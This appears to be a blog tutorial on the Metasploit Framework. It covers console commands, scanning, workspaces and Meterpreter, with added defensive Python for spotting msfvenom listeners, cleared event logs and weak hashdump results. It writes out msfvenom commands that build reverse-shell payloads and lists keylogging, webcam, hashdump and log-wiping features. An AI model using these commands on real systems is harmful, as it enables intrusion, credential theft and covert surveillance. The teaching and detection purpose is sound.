
Mastering Metasploit: A Comprehensive Guide to Ethical Hacking

XoX · 10 min read · Apr 15, 2024

Introduction #

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

Terminologies #

  1. RHOSTS: Remote Hosts, the target/victim machine(s).
  2. RPORT: Remote port on the target machine.
  3. PAYLOAD: The payload you will use with the exploit.
  4. LHOST: Local host, the attacker machine.
  5. LPORT: Local port on which the reverse shell connects back.
  6. SESSION: Each connection established to the target system using Metasploit gets a session ID.

Initialize #

To start Metasploit, run msfconsole.

msfconsole

The prompt shows msf6, which means Metasploit version 6 is running; the version may differ from system to system. If yours shows msf5, upgrade to the latest version.

History #

The history command shows the commands entered earlier in the console.

[Screenshot: history]

Search #

The search command with an exploit name as its parameter finds the module we need.

[Screenshot: Search by name]

If we do not know the name, we can also search by CVE identifier.

[Screenshot: Search by CVE]

Module #

We can select a module either by its number in the search results or by its full path.

The output also shows that the module's default payload, reverse_tcp, is configured automatically.

Options #

Use the options command to see which settings the module requires.

[Screenshot: Load module]

Info #

We can use the info command to check information about the exploit like name, platform, targets, and more.

[Screenshot: Info of exploit]

Payloads #

Use the show payloads command to list all the payloads available for the loaded module.

[Screenshot: Show payloads]

We can also narrow a search by adding the type: filter to the search command.

[Screenshot: Search type:<parameter>]

Set Options #

Use the set command to configure the required options, such as RHOSTS, SMBPass and SMBUser; which options are required varies with the exploit in use.

We also set LHOST when, for example, we are using TryHackMe's OpenVPN IP address.

[Screenshot: Set Options]

Here we can see that the exploit target has been selected automatically, so we do not need to assign it.

Exploit/Run #

After setting all the required options we use the exploit (or run) command to execute the exploit and payload against the target machine, which sends a reverse shell back to our attacker machine.

[Screenshot: Execute Exploit]

Unset #

The unset all command clears all the settings configured earlier, so the module can be set up again for another machine or purpose.

[Screenshot: Unset All Options]

Exploit Ranking #

[Table: Exploit rankings. Source: Metasploit Documentation]

Modules #

1. Metasploit cmd prompt:
The msfconsole prompt where all Metasploit commands are entered.

2. Meterpreter cmd prompt:
This means a Meterpreter agent was loaded to the target system and connected back to you.

3. Shell:
Once the exploit is completed, you may have access to a command shell on the target system. All commands typed here run on the target system.

4. Sessions:
Using the sessions option we can see the existing sessions.

To interact with any session, you can use the sessions -i command followed by the desired session number.

Scanning #

1. Port Scan:
Metasploit has several modules to scan open ports on the target system and network. You can list potential port scanning modules available using the search portscan command.

2. Nmap Scan:
You can directly perform Nmap scans from the msfconsole prompt as shown below.

3. UDP Scan:
The scanner/discovery/udp_sweep module lets you quickly identify services running over UDP. It does not conduct an extensive scan of all possible UDP services, but it is a quick way to identify services such as DNS or NetBIOS.

4. SMB Scan:
Metasploit offers several useful auxiliary modules that scan specific services. Below is an example for SMB. Especially useful in a corporate network are smb_enumshares and smb_version.

DataBase #

1. DB Status:
Check the database status using the db_status command.

2. List Workspaces:
The database feature will allow you to create workspaces to isolate different projects. When first launched, we will be in the default workspace. You can list available workspaces using the workspace command.

3. Adding Workspaces:
You can add a workspace with the -a parameter or delete one with the -d parameter. Below, a new workspace named "tryhackme" has been created.

The * symbol marks the currently active workspace.

4. Changing Workspace:
You can use the workspace command to navigate between workspaces simply by typing workspace followed by desired workspace name.

5. Workspace Help Menu:
You can use the workspace -h command to list available options for the workspace command.

6. DB Backend Cmd:
Unlike regular Metasploit usage, once Metasploit is launched with a database connected, the help command also shows the Database Backend Commands menu.

Msfvenom #

Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc).

Set Listener #

We will use the multi handler to receive the incoming connection. Load the module with the use exploit/multi/handler command.

Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.

Reverse Shell #

Once everything is set, we run the handler and wait for the incoming connection.

Other Payloads #

1. Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<port> -f exe > rev_shell.exe

2. PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP address> LPORT=<port> -f raw > rev_shell.php

3. ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<port> -f asp > rev_shell.asp

4. Python:

msfvenom -p cmd/unix/reverse_python LHOST=<IP address> LPORT=<port> -f raw > rev_shell.py
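
From the defender's side, the LHOST and LPORT values that go into an msfvenom command (and into the multi handler listening for the callback) are exactly the indicators a SOC can hunt for. The Python below is an added example, not part of the original post and not Metasploit's own code: it picks msfvenom invocations out of a constructed sample of process command-line telemetry (the command forms above, with invented values filled in), collects the LHOST:LPORT listener pairs, and matches them against a constructed outbound-connection log. The layouts of both samples are assumptions about what an EDR or firewall export would carry.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of process command-line telemetry (hypothetical EDR export).
# The msfvenom lines follow the forms shown in the post, with invented values.
COMMAND_LINES = [
    "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o rev_shell.exe",
    "msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=8080 -f raw > rev_shell.php",
    "ls -la /tmp",
    "/opt/metasploit/msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.5 LPORT=9001 -f raw > rev_shell.py",
]

# Constructed outbound-connection log (assumed layout):
# "<timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> <process>"
CONNECTION_LOG = [
    "2024-04-15T10:01:02Z 192.168.56.20:51234 -> 10.10.14.5:4444 tcp rev_shell.exe",
    "2024-04-15T10:01:10Z 192.168.56.20:51240 -> 142.250.74.78:443 tcp chrome.exe",
    "2024-04-15T10:02:33Z 192.168.56.31:40222 -> 10.10.14.5:9001 tcp python3",
    "2024-04-15T10:03:00Z 192.168.56.31:40230 -> 10.10.14.5:8443 tcp python3",
]


@dataclass(frozen=True)
class VenomIndicator:
    payload: str
    lhost: Optional[str]
    lport: Optional[int]
    fmt: Optional[str]
    output: Optional[str]


_OPT = re.compile(r"(?:^|\s)-([pfo])\s+(\S+)")       # -p payload, -f format, -o output file
_KV = re.compile(r"\b(LHOST|LPORT)=(\S+)")            # listener host/port options
_REDIRECT = re.compile(r">\s*(\S+)")                   # shell redirect used instead of -o
_CONN = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\S+) (\S+)$")


def parse_msfvenom(cmdline: str) -> Optional[VenomIndicator]:
    """Return the indicator carried by an msfvenom invocation, or None for any other command."""
    tokens = cmdline.split()
    if not tokens or tokens[0].rsplit("/", 1)[-1] != "msfvenom":
        return None
    opts = {m.group(1): m.group(2) for m in _OPT.finditer(cmdline)}
    kv = {m.group(1): m.group(2) for m in _KV.finditer(cmdline)}
    output = opts.get("o")
    if output is None:
        redirect = _REDIRECT.search(cmdline)
        output = redirect.group(1) if redirect else None
    lport = int(kv["LPORT"]) if kv.get("LPORT", "").isdigit() else None
    return VenomIndicator(opts.get("p", "<unknown>"), kv.get("LHOST"), lport, opts.get("f"), output)


def build_indicators(cmdlines):
    """Keep only the msfvenom invocations found in the telemetry."""
    return [ind for ind in map(parse_msfvenom, cmdlines) if ind is not None]


def match_connections(indicators, log_lines):
    """Return (timestamp, src_ip, process, payload) for each connection to a known LHOST:LPORT."""
    listeners = {(i.lhost, i.lport): i.payload for i in indicators if i.lhost and i.lport}
    hits = []
    for line in log_lines:
        m = _CONN.match(line)
        if not m:
            continue
        ts, src, _sport, dst, dport, _proto, proc = m.groups()
        payload = listeners.get((dst, int(dport)))
        if payload is not None:
            hits.append((ts, src, proc, payload))
    return hits


if __name__ == "__main__":
    indicators = build_indicators(COMMAND_LINES)
    for ind in indicators:
        print("indicator:", ind)
    for hit in match_connections(indicators, CONNECTION_LOG):
        print("connection to known listener:", hit)
```

Matching on the exact listener pair keeps false positives low; the port-8443 line in the sample is deliberately left unmatched to show that a hit requires both host and port, not just a destination seen elsewhere in the telemetry.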

Meterpreter #

Meterpreter comes in a number of versions, chosen according to the target system.

Meterpreter versions are available for the following platforms:

  • Android
  • Apple iOS
  • Java
  • Linux
  • OSX
  • PHP
  • Python
  • Windows

[Screenshot: List Meterpreter Payloads]
[Screenshot: Meterpreter Help Menu]

Meterpreter Commands #

If you run the help command, you will see the Meterpreter commands listed under different categories:

  • Core commands
  • File system commands
  • Networking commands
  • System commands
  • User interface commands
  • Webcam commands
  • Audio output commands
  • Elevate commands
  • Password database commands
  • Timestamp commands

Core commands:

  • background: Backgrounds the current session
  • exit: Terminate the Meterpreter session
  • guid: Get the session GUID (Globally Unique Identifier)
  • help: Displays the help menu
  • info: Displays information about a Post module
  • irb: Opens an interactive Ruby shell on the current session
  • load: Loads one or more Meterpreter extensions
  • migrate: Allows you to migrate Meterpreter to another process
  • run: Executes a Meterpreter script or Post module
  • sessions: Quickly switch to another session

File system commands:

  • cd: Will change directory
  • ls: Will list files in the current directory (dir will also work)
  • pwd: Prints the current working directory
  • edit: will allow you to edit a file
  • cat: Will show the contents of a file to the screen
  • rm: Will delete the specified file
  • search: Will search for files
  • upload: Will upload a file or directory
  • download: Will download a file or directory

Networking commands:

  • arp: Displays the host ARP (Address Resolution Protocol) cache
  • ifconfig: Displays network interfaces available on the target system
  • netstat: Displays the network connections
  • portfwd: Forwards a local port to a remote service
  • route: Allows you to view and modify the routing table

System commands:

  • clearev: Clears the event logs
  • execute: Executes a command
  • getpid: Shows the current process identifier
  • getuid: Shows the user that Meterpreter is running as
  • kill: Terminates a process
  • pkill: Terminates processes by name
  • ps: Lists running processes
  • reboot: Reboots the remote computer
  • shell: Drops into a system command shell
  • shutdown: Shuts down the remote computer
  • sysinfo: Gets information about the remote system, such as OS

Other commands:

  • idletime: Returns the number of seconds the remote user has been idle
  • keyscan_dump: Dumps the keystroke buffer
  • keyscan_start: Starts capturing keystrokes
  • keyscan_stop: Stops capturing keystrokes
  • screenshare: Allows you to watch the remote user's desktop in real-time
  • screenshot: Grabs a screenshot of the interactive desktop
  • record_mic: Records audio from the default microphone for X seconds
  • webcam_chat: Starts a video chat
  • webcam_list: Lists webcams
  • webcam_snap: Takes a snapshot from the specified webcam
  • webcam_stream: Plays a video stream from the specified webcam
  • getsystem: Attempts to elevate your privilege to that of local system
  • hashdump: Dumps the contents of the SAM database
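
The clearev command in the list above wipes the target's event logs, but on Windows the act of clearing a log is itself recorded: event ID 1102 in the Security log and event ID 104 in the System log. The Python below is an added example, not from the post and not Metasploit code, that flags those records in a constructed sample of exported events and rates a host higher when more than one log is cleared within a short window. The record layout and the five-minute threshold are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of exported Windows event records (field names modelled on
# what a SIEM would carry; not real telemetry).
EVENTS = [
    {"host": "WS01", "channel": "Security", "event_id": 4624, "time": "2024-04-15T09:58:00", "user": "alice"},
    {"host": "WS01", "channel": "Security", "event_id": 1102, "time": "2024-04-15T10:05:12", "user": "SYSTEM"},
    {"host": "WS01", "channel": "System",   "event_id": 104,  "time": "2024-04-15T10:05:13", "user": "SYSTEM"},
    {"host": "WS02", "channel": "System",   "event_id": 104,  "time": "2024-04-15T11:30:00", "user": "itadmin"},
    {"host": "WS02", "channel": "Security", "event_id": 4688, "time": "2024-04-15T11:31:00", "user": "itadmin"},
]

# Event IDs Windows writes when a log is cleared: 1102 in Security, 104 in System.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def find_log_clears(events):
    """Return only the log-clearing events, oldest first."""
    clears = [e for e in events if (e["channel"], e["event_id"]) in CLEAR_EVENTS]
    return sorted(clears, key=lambda e: e["time"])


def score_log_clears(events, window=timedelta(minutes=5)):
    """Group clears per host; more than one log wiped within `window` is rated high (assumed threshold)."""
    by_host = {}
    for e in find_log_clears(events):
        by_host.setdefault(e["host"], []).append(e)

    findings = {}
    for host, clears in by_host.items():
        times = [datetime.fromisoformat(c["time"]) for c in clears]
        channels = {c["channel"] for c in clears}
        burst = len(channels) > 1 and (max(times) - min(times)) <= window
        findings[host] = {
            "severity": "high" if burst else "medium",
            "channels": sorted(channels),
            "users": sorted({c["user"] for c in clears}),
            "first": min(times).isoformat(),
        }
    return findings


if __name__ == "__main__":
    for host, finding in score_log_clears(EVENTS).items():
        print(host, finding)
```

A single cleared log can be routine maintenance (WS02 in the sample, done by an admin account), so it is rated medium; Security and System wiped a second apart under SYSTEM (WS01) is the pattern worth paging on. Forwarding logs to a collector before they can be cleared is the real mitigation; this check only tells you that clearing happened.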

Post-Exploitation #

1. getuid:
The getuid command displays the user that Meterpreter is currently running as. This gives you an idea of your possible privilege level on the target system (e.g., are you an admin-level user like NT AUTHORITY\SYSTEM or a regular user?).

2. ps and migrate:
The ps command will list running processes. The PID column will also give you the PID information you will need to migrate the Meterpreter to another process.

3. hashdump:
The hashdump command lists the content of the SAM database. The SAM database stores users' password hashes on Windows systems, in the NTLM hash format.

4. search:
The search command is useful for locating files with potentially juicy information. In actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.

5. Shell:
The shell command will launch a regular command-line shell on the target system.
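
In an authorized engagement, hashdump output is evidence for the report rather than an end in itself. The Python below is an added example, not the post's or Metasploit's code: it parses constructed lines in the user:RID:LM hash:NT hash::: layout that hashdump prints and turns them into remediation findings: blank passwords (the NT hash of the empty password), LM hashes still being stored (anything other than the empty-LM constant) and one password shared across several accounts. The hashes in the sample are the two well-known empty-password constants plus made-up hex, not real credentials.

```python
import re
from collections import defaultdict

# Constructed sample in the hashdump output format (user:RID:LM hash:NT hash:::).
# Hash values are the well-known "empty" constants or invented hex, not real credentials.
HASHDUMP_OUTPUT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
svc_backup:1003:0123456789abcdef0123456789abcdef:ffeeddccbbaa99887766554433221100:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_hashdump(text):
    """Parse hashdump lines into dicts; lines that do not match the format are skipped."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def triage(rows):
    """Derive remediation findings: blank passwords, LM hashes still stored, shared passwords."""
    findings = []
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (LM hashing not disabled)"))
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "same password shared across accounts"))
    return findings


if __name__ == "__main__":
    for subject, issue in triage(parse_hashdump(HASHDUMP_OUTPUT)):
        print(f"{subject}: {issue}")
```

Each finding maps to a concrete fix (set a password or disable the account, enforce NoLMHash, stop password reuse), which is what the report should carry; the hashes themselves should not be reproduced in it.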

Conclusion #

As we conclude our exploration of Metasploit, it’s clear that this powerful framework has revolutionized the field of cybersecurity. From its humble beginnings as a hobby project to its current status as an essential tool for security professionals worldwide, Metasploit continues to evolve and adapt to the ever-changing landscape of cyber threats.

Remember, with great power comes great responsibility. It’s essential to always use tools like Metasploit ethically and responsibly, respecting the boundaries of legality and privacy. Continuously expanding your knowledge and skills in cybersecurity is vital in staying ahead of potential threats and contributing positively to the security community.

I hope this blog has provided you with valuable insights into the world of Metasploit and inspired you to delve deeper into this fascinating field. There is a lot more to learn about Metasploit; I suggest exploring it yourself and learning the more advanced concepts.

“Metasploit: Where innovation meets infiltration, turning vulnerabilities into victories.”

Be sure to explore our other blog entries for further guidance on navigating the digital landscape and enhancing your learning experience!

☣ Happy Hacking! ☣
— XoX

Written by XoX

CEHv12 | TCM PEH - SOC 101 - OSINT - Linux | Red Team | Blue Team | Cyber Security Engineer | Penetration Testing | Security is a Joke | Fs.
